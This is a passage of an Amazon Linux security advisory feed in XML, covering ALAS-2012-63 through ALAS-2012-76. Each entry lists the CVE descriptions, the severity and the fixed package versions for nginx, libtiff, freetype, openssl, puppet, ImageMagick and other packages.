from="linux-security@amazon.com"><id>ALAS-2012-63</id><title>Amazon Linux - ALAS-2012-63: medium priority package update for nginx</title><issued date="2012-04-05 12:50:00" /><updated date="2014-09-14 15:58:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1180:
Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
803856:
CVE-2012-1180 nginx: malformed HTTP response headers leads to information leak
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1180" title="" id="CVE-2012-1180" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nginx" version="1.0.14" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/nginx-1.0.14-1.8.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.0.14" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/nginx-debuginfo-1.0.14-1.8.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.0.14" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nginx-debuginfo-1.0.14-1.8.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.0.14" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nginx-1.0.14-1.8.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-64</id><title>Amazon Linux - ALAS-2012-64: low priority package update for iproute</title><issued date="2012-04-05 12:51:00" /><updated date="2014-09-14 16:09:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1088:
iproute2 before 3.3.0 allows local users to overwrite arbitrary files via a symlink attack on a temporary file used by (1) configure or (2) examples/dhcp-client-script.
797878:
CVE-2012-1088 iproute: multiple insecure temporary file use issues
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1088" title="" id="CVE-2012-1088" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="iproute-doc" version="3.2.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/iproute-doc-3.2.0-3.7.amzn1.i686.rpm</filename></package><package name="iproute-devel" version="3.2.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/iproute-devel-3.2.0-3.7.amzn1.i686.rpm</filename></package><package name="iproute" version="3.2.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/iproute-3.2.0-3.7.amzn1.i686.rpm</filename></package><package name="iproute-debuginfo" version="3.2.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/iproute-debuginfo-3.2.0-3.7.amzn1.i686.rpm</filename></package><package name="iproute-doc" version="3.2.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/iproute-doc-3.2.0-3.7.amzn1.x86_64.rpm</filename></package><package name="iproute-devel" version="3.2.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/iproute-devel-3.2.0-3.7.amzn1.x86_64.rpm</filename></package><package name="iproute-debuginfo" version="3.2.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/iproute-debuginfo-3.2.0-3.7.amzn1.x86_64.rpm</filename></package><package name="iproute" version="3.2.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/iproute-3.2.0-3.7.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-65</id><title>Amazon Linux - ALAS-2012-65: important priority package update for libtiff</title><issued date="2012-04-30 14:43:00" /><updated date="2014-09-14 15:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1173:
Two integer overflow flaws, leading to heap-based buffer overflows, were found in the way libtiff attempted to allocate space for a tile in a TIFF image file. An attacker could use these flaws to create a specially-crafted TIFF file that, when opened, would cause an application linked against libtiff to crash or, possibly, execute arbitrary code.
Multiple integer overflows in tiff_getimage.c in LibTIFF 3.9.4 allow remote attackers to execute arbitrary code via a crafted tile size in a TIFF file, which is not properly handled by the (1) gtTileSeparate or (2) gtStripSeparate function, leading to a heap-based buffer overflow.
803078:
CVE-2012-1173 libtiff: Heap-buffer overflow due to TileSize calculation when parsing tiff files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1173" title="" id="CVE-2012-1173" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0468.html" title="" id="RHSA-2012:0468" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libtiff-debuginfo" version="3.9.4" release="5.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-3.9.4-5.8.amzn1.i686.rpm</filename></package><package name="libtiff" version="3.9.4" release="5.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-3.9.4-5.8.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="5.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-3.9.4-5.8.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="5.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-3.9.4-5.8.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="5.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-3.9.4-5.8.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="3.9.4" release="5.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-3.9.4-5.8.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="5.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-3.9.4-5.8.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="3.9.4" release="5.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-3.9.4-5.8.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-66</id><title>Amazon Linux - ALAS-2012-66: important priority package update for freetype</title><issued date="2012-04-30 14:46:00" /><updated date="2014-09-14 15:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1134:
Multiple flaws were found in the way FreeType handled TrueType Font (TTF), Glyph Bitmap Distribution Format (BDF), Windows .fnt and .fon, and PostScript Type 1 fonts. If a specially-crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 and other products, allows remote attackers to cause a denial of service (invalid heap write operation and memory corruption) or possibly execute arbitrary code via crafted private-dictionary data in a Type 1 font.
800592:
CVE-2012-1134 freetype: limited heap buffer overflow in Type1 parser T1_Get_Private_Dict() (#35608)
CVE-2012-1126:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially-crafted font file was loaded by an application linked against FreeType, it could cause the application to crash.
FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 and other products, allows remote attackers to cause a denial of service (invalid heap read operation and memory corruption) or possibly execute arbitrary code via crafted property data in a BDF font.
800581:
CVE-2012-1126 freetype: heap buffer over-read in BDF parsing _bdf_is_atom() (#35597, #35598)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1126" title="" id="CVE-2012-1126" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1134" title="" id="CVE-2012-1134" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0467.html" title="" id="RHSA-2012:0467" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="freetype" version="2.3.11" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-6.12.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-6.12.amzn1.i686.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-6.12.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-6.12.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-6.12.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-6.12.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-6.12.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-6.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-67</id><title>Amazon Linux - ALAS-2012-67: medium priority package update for nvidia</title><issued date="2012-04-30 14:47:00" /><updated date="2014-09-14 16:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0946:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0946" title="" id="CVE-2012-0946" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nvidia" version="295.40.3.2.12" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/nvidia-295.40.3.2.12-1.1.amzn1.x86_64.rpm</filename></package><package name="nvidia-kmod" version="295.40.3.2.12" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/nvidia-kmod-295.40.3.2.12-1.1.amzn1.x86_64.rpm</filename></package><package name="nvidia-kmod-3.2.12-3.2.4.amzn1" version="295.40" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/nvidia-kmod-3.2.12-3.2.4.amzn1-295.40-1.1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-68</id><title>Amazon Linux - ALAS-2012-68: medium priority package update for libpng</title><issued date="2012-04-30 14:52:00" /><updated date="2014-09-14 15:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3048:
The png_set_text_2 function in pngset.c in libpng 1.0.x before 1.0.59, 1.2.x before 1.2.49, 1.4.x before 1.4.11, and 1.5.x before 1.5.10 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted text chunk in a PNG image file, which triggers a memory allocation failure that is not properly handled, leading to a heap-based buffer overflow.
A heap-based buffer overflow flaw was found in the way libpng processed tEXt chunks in PNG image files. An attacker could create a specially-crafted PNG image file that, when opened, could cause an application using libpng to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
808139:
CVE-2011-3048 libpng: memory corruption flaw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3048" title="" id="CVE-2011-3048" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0523.html" title="" id="RHSA-2012:0523" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libpng-devel" version="1.2.49" release="1.12.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-devel-1.2.49-1.12.amzn1.i686.rpm</filename></package><package name="libpng-static" version="1.2.49" release="1.12.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-static-1.2.49-1.12.amzn1.i686.rpm</filename></package><package name="libpng-debuginfo" version="1.2.49" release="1.12.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-debuginfo-1.2.49-1.12.amzn1.i686.rpm</filename></package><package name="libpng" version="1.2.49" release="1.12.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-1.2.49-1.12.amzn1.i686.rpm</filename></package><package name="libpng-static" version="1.2.49" release="1.12.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-static-1.2.49-1.12.amzn1.x86_64.rpm</filename></package><package name="libpng" version="1.2.49" release="1.12.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-1.2.49-1.12.amzn1.x86_64.rpm</filename></package><package name="libpng-debuginfo" version="1.2.49" release="1.12.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-debuginfo-1.2.49-1.12.amzn1.x86_64.rpm</filename></package><package name="libpng-devel" version="1.2.49" release="1.12.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-devel-1.2.49-1.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-69</id><title>Amazon Linux - ALAS-2012-69: low priority package update for perl-YAML-LibYAML</title><issued date="2012-04-30 14:53:00" /><updated date="2014-09-14 15:59:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1152:
Multiple format string vulnerabilities in the error reporting functionality in the YAML::LibYAML (aka YAML-LibYAML and perl-YAML-LibYAML) module 0.38 for Perl allow remote attackers to cause a denial of service (process crash) via format string specifiers in a (1) YAML stream to the Load function, (2) YAML node to the load_node function, (3) YAML mapping to the load_mapping function, or (4) YAML sequence to the load_sequence function.
801738:
CVE-2012-1152 perl-YAML-LibYAML: Multiple format string flaws by reporting errors during YAML document load
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1152" title="" id="CVE-2012-1152" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="perl-YAML-LibYAML-debuginfo" version="0.38" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/perl-YAML-LibYAML-debuginfo-0.38-2.2.amzn1.i686.rpm</filename></package><package name="perl-YAML-LibYAML" version="0.38" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/perl-YAML-LibYAML-0.38-2.2.amzn1.i686.rpm</filename></package><package name="perl-YAML-LibYAML-debuginfo" version="0.38" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-YAML-LibYAML-debuginfo-0.38-2.2.amzn1.x86_64.rpm</filename></package><package name="perl-YAML-LibYAML" version="0.38" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-YAML-LibYAML-0.38-2.2.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-70</id><title>Amazon Linux - ALAS-2012-70: medium priority package update for quagga</title><issued date="2012-04-30 14:55:00" /><updated date="2014-09-14 15:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0250:
Buffer overflow in the OSPFv2 implementation in ospfd in Quagga before 0.99.20.1 allows remote attackers to cause a denial of service (daemon crash) via a Link State Update (aka LS Update) packet containing a network-LSA link-state advertisement for which the data-structure length is smaller than the value in the Length header field.
A buffer overflow flaw was found in the way the ospfd daemon processed certain Link State Update packets. An OSPF router could use this flaw to crash ospfd on an adjacent router.
802829:
CVE-2012-0250 quagga (ospfd): Crash by processing LS-Update OSPF packet due improper length check of the Network-LSA structures
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0250" title="" id="CVE-2012-0250" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="quagga-contrib" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-contrib-0.99.20.1-1.4.amzn1.i686.rpm</filename></package><package name="quagga" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-0.99.20.1-1.4.amzn1.i686.rpm</filename></package><package name="quagga-devel" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-devel-0.99.20.1-1.4.amzn1.i686.rpm</filename></package><package name="quagga-debuginfo" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-debuginfo-0.99.20.1-1.4.amzn1.i686.rpm</filename></package><package name="quagga-contrib" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-contrib-0.99.20.1-1.4.amzn1.x86_64.rpm</filename></package><package name="quagga-devel" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-devel-0.99.20.1-1.4.amzn1.x86_64.rpm</filename></package><package name="quagga" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-0.99.20.1-1.4.amzn1.x86_64.rpm</filename></package><package name="quagga-debuginfo" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-debuginfo-0.99.20.1-1.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-71</id><title>Amazon Linux - ALAS-2012-71: medium priority package update for wireshark</title><issued date="2012-04-30 16:16:00" /><updated date="2014-09-14 15:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-1590:
The X.509if dissector in Wireshark 1.2.x before 1.2.16 and 1.4.x before 1.4.5 does not properly initialize certain global variables, which allows remote attackers to cause a denial of service (application crash) via a crafted .pcap file.
Several flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
697741:
CVE-2011-1590 Wireshark: Use-after-free causes heap-based buffer overflow in X.509if dissector
CVE-2011-1143:
epan/dissectors/packet-ntlmssp.c in the NTLMSSP dissector in Wireshark before 1.4.4 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted .pcap file.
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
681760:
CVE-2011-1143 Wireshark: Null pointer dereference causing application crash when reading malformed pcap file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1143" title="" id="CVE-2011-1143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1590" title="" id="CVE-2011-1590" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0509.html" title="" id="RHSA-2012:0509" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="wireshark-devel" version="1.2.15" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.2.15-2.10.amzn1.i686.rpm</filename></package><package name="wireshark" version="1.2.15" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.2.15-2.10.amzn1.i686.rpm</filename></package><package name="wireshark-debuginfo" version="1.2.15" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.2.15-2.10.amzn1.i686.rpm</filename></package><package name="wireshark-debuginfo" version="1.2.15" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.2.15-2.10.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.2.15" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.2.15-2.10.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.2.15" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.2.15-2.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-72</id><title>Amazon Linux - ALAS-2012-72: important priority package update for openssl</title><issued date="2012-05-02 12:28:00" /><updated date="2014-09-14 15:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2110:
The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key.
Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code.
814185:
CVE-2012-2110 openssl: asn1_d2i_read_bio integer errors leading to buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2110" title="" id="CVE-2012-2110" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0518.html" title="" id="RHSA-2012:0518" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssl-static" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-static-1.0.0i-1.41.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-devel-1.0.0i-1.41.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-1.0.0i-1.41.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-perl-1.0.0i-1.41.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-debuginfo-1.0.0i-1.41.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-devel-1.0.0i-1.41.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-perl-1.0.0i-1.41.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-static-1.0.0i-1.41.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.0i-1.41.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-1.0.0i-1.41.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-73</id><title>Amazon Linux - ALAS-2012-73: important priority package update for openssl098e</title><issued date="2012-05-02 12:31:00" /><updated date="2014-09-14 15:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2110:
The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key.
Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code.
814185:
CVE-2012-2110 openssl: asn1_d2i_read_bio integer errors leading to buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2110" title="" id="CVE-2012-2110" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0518.html" title="" id="RHSA-2012:0518" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssl098e" version="0.9.8e" release="17.8.amzn1" epoch="0" arch="i686"><filename>Packages/openssl098e-0.9.8e-17.8.amzn1.i686.rpm</filename></package><package name="openssl098e-debuginfo" version="0.9.8e" release="17.8.amzn1" epoch="0" arch="i686"><filename>Packages/openssl098e-debuginfo-0.9.8e-17.8.amzn1.i686.rpm</filename></package><package name="openssl098e-debuginfo" version="0.9.8e" release="17.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl098e-debuginfo-0.9.8e-17.8.amzn1.x86_64.rpm</filename></package><package name="openssl098e" version="0.9.8e" release="17.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl098e-0.9.8e-17.8.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-74</id><title>Amazon Linux - ALAS-2012-74: important priority package update for nginx</title><issued date="2012-05-08 23:12:00" /><updated date="2014-09-14 16:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2089:
Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
812093:
CVE-2012-2089 nginx: arbitrary code execution in mp4 pseudo-streaming module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2089" title="" id="CVE-2012-2089" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nginx" version="1.0.15" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/nginx-1.0.15-1.9.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.0.15" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/nginx-debuginfo-1.0.15-1.9.amzn1.i686.rpm</filename></package><package name="nginx" version="1.0.15" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/nginx-1.0.15-1.9.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.0.15" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/nginx-debuginfo-1.0.15-1.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-75</id><title>Amazon Linux - ALAS-2012-75: medium priority package update for puppet</title><issued date="2012-05-08 23:13:00" /><updated date="2014-09-14 16:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1986:
Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet Enterprise (PE) Users 1.0, 1.1, 1.2.x, 2.0.x, and 2.5.x before 2.5.1 allows remote authenticated users with an authorized SSL key and certain permissions on the puppet master to read arbitrary files via a symlink attack in conjunction with a crafted REST request for a file in a filebucket.
810069:
CVE-2012-1986 puppet: Filebucket arbitrary file read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1986" title="" id="CVE-2012-1986" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="puppet-debuginfo" version="2.6.16" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.6.16-1.6.amzn1.i686.rpm</filename></package><package name="puppet" version="2.6.16" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.6.16-1.6.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.6.16" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.6.16-1.6.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.6.16" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.6.16-1.6.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.6.16" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.6.16-1.6.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.6.16" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.6.16-1.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-76</id><title>Amazon Linux - ALAS-2012-76: medium priority package update for ImageMagick</title><issued date="2012-05-08 23:14:00" /><updated date="2014-09-14 16:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1798:
The TIFFGetEXIFProperties function in coders/tiff.c in ImageMagick before 6.7.6-3 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted EXIF IFD in a TIFF image.
An out-of-bounds buffer read flaw was found in the way ImageMagick processed certain TIFF image files. A remote attacker could provide a TIFF image with a specially-crafted Exif IFD value (the set of tags for recording Exif-specific attribute information), which once opened by ImageMagick, would cause it to crash.
807997:
CVE-2012-1798 ImageMagick: Out-of-bounds buffer read by copying image bytes for TIFF images with crafted TIFF EXIF IFD value
CVE-2012-0260:
